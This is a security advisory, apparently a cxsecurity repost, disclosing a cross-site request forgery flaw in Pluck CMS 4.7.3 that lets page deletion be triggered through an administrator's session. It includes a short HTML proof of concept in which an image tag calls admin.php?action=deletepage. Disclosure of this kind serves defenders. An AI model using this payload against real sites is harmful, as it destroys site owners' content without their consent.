Pluck 4.7.3 - (Delete Files) CSRF Vulnerability

2016.10.17
fr ZwX (FR) fr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Document Title: =============== Pluck 4.7.3 - (Delete Files) CSRF Vulnerability Release Date: ============= 2016-10-12 Vulnerability Disclosure Timeline: ================================== 2016-10-12 : Discovery of the Vulnerability 2016-10-12 : Contact the Vendor (No Respose) 2016-10-17 : Public Disclosure Product & Service Introduction: =============================== Pluck, also known as pluck-cms, is an open source content management system, written in the PHP scripting language. It allows for webpage creation for users with little or no programming experience, and, unlike most content management systems, does not use a database to store its data. Pluck also includes a module system, which allows developers to integrate custom functionality into the system. (Copy of the Vendor Homepage: http://www.pluck-cms.org/ ) Affected Product(s): ==================== Product: Pluck v4.7.3 - Content Management System Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A cross site request forgery web vulnerability has been discovered in the official Pluck v4.7.3 web-application. The issue allows remote attackers to manipulate client-side browser to web-application requests to execute service functions via non-expired session credentials. The cross site request forgery vulnerability is located in the cms `var1` parameter of the `admin.php` module POST method request. In the absence of a security token an attacker can execute code arbitrary against administrator account to permanenly delete the pages of the website via panel. Due to the infrastructure the issue becomes more critical without a checkbox to confirm the delete of any page. Proof of Concept (PoC): ======================= The csrf web vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. ---PoC: Exploitation--- <html> <title>Delete Pages CSRF</title> <!-- Cross Site Request Forgery --> <meta http-equiv="refresh" content="0"> <img src="http://localhost:8080/admin.php?action=deletepage&var1=[VULNERABILITY-LAB]"/> </meta> </html> Reference(s): http://localhost:8080/ http://localhost:8080/login.php http://localhost:8080/admin.php http://localhost:8080/admin.php?action= http://localhost:8080/admin.php?action=deletepage http://localhost:8080/admin.php?action=deletepage&var1= [+] Disclaimer [+] =================== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Domain: www.zwx.fr Contact: msk4@live.fr Social: twitter.com/XSSed.fr Feeds: www.zwx.fr/feed/ Advisory: www.vulnerability-lab.com/show.php?user=ZwX packetstormsecurity.com/files/author/12026/ cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/ 0day.today/author/27461 Copyright © 2016 | ZwX - Security Researcher (Software & web application)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top